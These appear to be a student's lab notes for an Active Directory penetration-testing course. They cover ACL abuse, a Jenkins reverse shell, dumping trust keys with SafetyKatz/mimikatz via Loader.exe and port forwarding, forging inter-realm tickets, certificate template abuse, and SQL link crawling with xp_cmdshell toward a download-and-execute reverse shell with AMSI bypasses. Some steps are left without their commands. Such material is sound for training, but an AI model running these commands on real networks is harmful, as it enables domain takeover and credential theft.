Find a computer object in dcorp domain where we have Write permissions.
Abuse the Write permissions to access that computer as Domain Admin.
Solution -:
Start up a PowerShell session using Invisi-Shell
Enumerate Write permissions for a user that we have compromised -:
# Load invisi-shell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
# Enum writes for all users
Find-InterestingDomainACL | select IdentityReferenceName, ActiveDirectoryRights
# Enum writes for a specific user
Find-InterestingDomainACL | ?{$_.identityreferencename -match 'ciadmin'}
# Note that the most important output from 'ActiveDirectoryRights'
# is the 'GenericWrite', this is what we are looking for
[!hint] After trying from multiple users or using BloodHound we would know that the user ciadmin has Write permissions on the computer object of dcorp-mgmt (the Jenkins instance)
Let's use the reverse shell that we have and load PowerView there
Go ahead and get a reverse shell as ciadmin with the Jenkins instance
Establish Resource-Based Constrained Delegation (RBCD) on dcorp-mgmt for Student VMs, Consider Applying to All Lab Instances for Collaborative Exploration
Using DA access to dollarcorp.moneycorp.local, escalate privileges to Enterprise Admin or DA to the parent domain, moneycorp.local using the domain trust key.
Solution -:
Step 1 - Retrieve Trust Key for dollarcorp and moneycrop Trust using Mimikatz or SafetyKatz.
Start a process with DA privileges (Run command from elevated prompt)
Execute the following commands from the process running as Domain Admin to copy Loader.exe to dcorp-dc and leverage it for extracting credentials, considering potential variations in the trust key for your lab instance
# copy loader.exe to dcorp-dc
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y
# spawn interactive shell on dcorp-dc
winrs -r:dcorp-dc cmd
# set up port forwarding
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.X
# Load loader.exe on memory of dcorp-dc
# Make sure to host SafetyKatz.exe on HFS first
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe
# Extract credentials on the new mimikatz session
lsadump::trust /patch
Step 2 - Use the extracted information to forge a ticket
Forge a ticket with SID History of Enterprise Admins. Run the below command from an elevated command prompt
Step 3 - Try access the file system of Enterprise admin (mcorp-dc)
Check if we can access file system on mcorp-dc!
dir \\mcorp-dc.moneycorp.local\c$
[!bug] Learning Objective 19
Using DA access to dollarcorp.moneycorp.local, escalate privileges to Enterprise Admin or DA to the parent domain, moneycorp.local using dollarcorp's krbtgt hash.
Solution -:
We already have the krbtgt hash from dcorp-dc using DCsync attack. Let's create the inter-realm TGT and inject. Run the below command from an elevated command prompt
Run below commands from the process running as DA to copy Loader.exe on dcorp-dc and use it to extract credentials. Note that the trust key may be different in your lab instance:
# copy loader.exe to dcorp-dc
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y
# get interactive shell
winrs -r:dcorp-dc cmd
# enable port forwarding
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.x
# Make sure to host SafetyKatz.exe on HFS
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe
# Extract credentials on the new mimikatz session
lsadump::trust /patch
Example -:
[!note] Make sure you don't make the mistake of copying the trust key (rc4_hmac_nt), of MONEYCORP.LOCAL instead of EUROCORP.LOCAL as used in the below command "/rc4:", scrolling down a little bit on the command output will help
Forge an inter-realm TGT. Run command from an elevated command prompt
[!note] Sweet! The HTTPSCertificates template grants enrollment rights to RDPUsers group and allows requestor to supply Subject Name. Recall that studentx is a member of RDPUsers group. This means that we can request certificate for any user as studentx .
Request a certificate for Domain Admin - Administrator
[!tip] To know how to do Privilege Escalation to DA and EA using ESC3 and ESC6, Check Lab Manual, I only practiced it, but did not take notes, in the exam lab, make sure to refer to lab manual and check both of them
[!bug] Learning Objective 22
Get a reverse shell on a SQL server in eurocorp forest by abusing database links from dcorp-mssql.
Solution -:
We start with enumerating SQL servers in the domain and if studentx has privileges to connect to any of them. We can use PowerUpSQL module for that
Sweet! We have sysadmin set to 1 which means True on eu-sql33 server!
Let try to get command execution on eu-sql33
# -Instance : the first sql instance
# -Query : command to run
# -QueryTarget : our target which has all condition met
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'whoami'" -QueryTarget eu-sql33
Example Output
Let’s try to execute a PowerShell download execute cradle to execute a PowerShell reverse shell on the eu-sql33 instance. Remember to start a listener
Make sure to start your HFS first and upload the file sbloggingbypass.txt, amsibypass.txt and Invoke-PowerShellTcpEx.ps1 in other to host them